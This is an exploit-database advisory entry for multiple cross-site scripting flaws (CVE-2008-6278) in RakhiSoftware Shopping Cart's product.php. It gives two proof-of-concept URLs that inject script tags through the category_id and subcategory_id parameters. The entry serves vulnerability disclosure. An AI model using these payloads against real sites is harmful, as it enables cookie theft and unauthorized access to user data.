[] NeoSense

RakhiSoftware Shopping Cart - 'product.php' Multiple Cross-Site Scripting Vulnerabilities

Author: Charalambous Glafkos
type: webapps
platform: php
port: 
date_added: 2008-11-28 
date_updated: 2014-03-31 
verified: 1 
codes: CVE-2008-6278;OSVDB-50326 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/32563/info

RakhiSoftware Shopping Cart is prone to multiple remote vulnerabilities.

Exploiting these issues can allow attackers to obtain sensitive information, steal cookie data, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://www.example.com/rjbike_new/product.php?category_id=>'><script>alert(19 49308870);</script>&subcategory_id=1

http://www.example.com/rjbike_new/product.php?category_id=1&subcategory_id=>' ><script>alert(1949308870);</script>